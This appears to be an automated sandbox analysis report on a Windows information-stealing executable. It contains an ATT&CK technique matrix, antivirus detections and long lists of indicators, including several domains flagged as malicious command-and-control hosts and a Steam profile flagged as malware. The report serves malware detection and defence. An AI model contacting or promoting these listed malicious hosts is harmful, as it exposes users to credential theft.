    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Command and Scripting Interpreter
    1
    DLL Side-Loading
    1
    Process Injection
    24
    Virtualization/Sandbox Evasion
    OS Credential Dumping631
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    1
    Process Injection
    LSASS Memory24
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Deobfuscate/Decode Files or Information
    Security Account Manager2
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
    Obfuscated Files or Information
    NTDS23
    System Information Discovery
    Distributed Component Object ModelInput Capture114
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing
    LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    file.exe100%AviraTR/Crypt.ZPACK.Gen
    file.exe100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    steamcommunity.com0%VirustotalBrowse
    sensatinwu.buzz0%VirustotalBrowse
    bathdoomgaz.store1%VirustotalBrowse
    spirittunek.store1%VirustotalBrowse
    clearancek.site1%VirustotalBrowse
    dissapoiznw.store1%VirustotalBrowse
    mobbipenju.store1%VirustotalBrowse
    studennotediw.store1%VirustotalBrowse
    eaglepawnoy.store1%VirustotalBrowse
    licendfilteo.site1%VirustotalBrowse
    SourceDetectionScannerLabelLink
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/en/0%URL Reputationsafe
    https://store.steampowered.com/news/0%URL Reputationsafe
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
    https://store.steampowered.com/stats/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
    https://store.steampowered.com/legal/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://store.steampowered.com/points/shop/0%URL Reputationsafe
    https://store.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
    https://store.steampowered.com/mobile0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=engl0%URL Reputationsafe
    https://store.steampowered.com/about/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/badges100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp0%VirustotalBrowse
    https://steamcommunity.com/my/wishlist/0%VirustotalBrowse
    https://steamcommunity.com/market/0%VirustotalBrowse
    https://steamcommunity.com/discussions/0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=9yzMGndrVfY4&amp;l=e0%VirustotalBrowse
    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%VirustotalBrowse
    https://steamcommunity.com/login/home/?goto=profiles%2F765611997243319000%VirustotalBrowse
    https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse
    clearancek.site1%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=AeTz0%VirustotalBrowse
    https://steamcommunity.com/workshop/0%VirustotalBrowse
    licendfilteo.site1%VirustotalBrowse
    https://sensatinwu.buzz/0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e0%VirustotalBrowse
    https://steamcommunity.com/p0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%VirustotalBrowse
    https://sensatinwu.buzz/api0%VirustotalBrowse
    https://steamcommunity.com/0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%VirustotalBrowse
    NameIPActiveMaliciousAntivirus DetectionReputation
    steamcommunity.com
    104.102.49.254
    truefalseunknown
    sensatinwu.buzz
    188.114.96.3
    truetrueunknown
    eaglepawnoy.store
    unknown
    unknownfalseunknown
    bathdoomgaz.store
    unknown
    unknownfalseunknown
    spirittunek.store
    unknown
    unknownfalseunknown
    licendfilteo.site
    unknown
    unknowntrueunknown
    studennotediw.store
    unknown
    unknownfalseunknown
    mobbipenju.store
    unknown
    unknownfalseunknown
    clearancek.site
    unknown
    unknowntrueunknown
    dissapoiznw.store
    unknown
    unknownfalseunknown
    NameMaliciousAntivirus DetectionReputation
    studennotediw.stortrue
      unknown
      spirittunek.stortrue
        unknown
        eaglepawnoy.stortrue
          unknown
          clearancek.sitetrueunknown
          mobbipenju.stortrue
            unknown
            https://steamcommunity.com/profiles/76561199724331900true
            • URL Reputation: malware
            unknown
            licendfilteo.sitetrueunknown
            bathdoomgaz.stortrue
              unknown
              https://sensatinwu.buzz/apitrueunknown
              dissapoiznw.stortrue
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://steamcommunity.com/my/wishlist/file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://sensatinwu.buzz/apiqfile.exe, 00000000.00000003.2076048362.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075963595.0000000000F8D000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://help.steampowered.com/en/file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://steamcommunity.com/market/file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://store.steampowered.com/news/file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://community.akamai.steamstatic.com/public/javascript/applicat4file.exe, 00000000.00000003.2076037968.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075963595.0000000000F8D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076150417.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094750682.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094750682.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.valvesoftware.com/legal.htmfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/discussions/file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=9yzMGndrVfY4&amp;l=efile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://store.steampowered.com/stats/file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094750682.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://store.steampowered.com/steam_refunds/file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=AeTzfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://sensatinwu.buzz/file.exe, 00000000.00000003.2076057849.0000000000F8D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075963595.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094677746.0000000000F63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075963595.0000000000F8D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076057849.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094713048.0000000000F8D000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://steamcommunity.com/workshop/file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://store.steampowered.com/legal/file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094750682.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=efile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://community.akamai.steamstatfile.exe, 00000000.00000003.2076037968.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075963595.0000000000F8D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076150417.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://avatars.akamai.steamstattfile.exe, 00000000.00000003.2076037968.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075963595.0000000000F8D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076150417.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englfile.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://steamcommunity.com/pfile.exe, 00000000.00000003.2075963595.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094677746.0000000000F63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076057849.0000000000F62000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        http://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094750682.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://store.steampowered.com/points/shop/file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://store.steampowered.com/file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075963595.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://steamcommunity.com/profiles/76561199724331900/inventory/file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094750682.0000000000FDA000.00000004.00000020.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        unknown
                        https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&afile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgfile.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2Rfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=englishfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://store.steampowered.com/account/cookiepreferences/file.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094750682.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://store.steampowered.com/mobilefile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://steamcommunity.com/file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=englishfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisfile.exe, 00000000.00000003.2076150417.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075939636.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
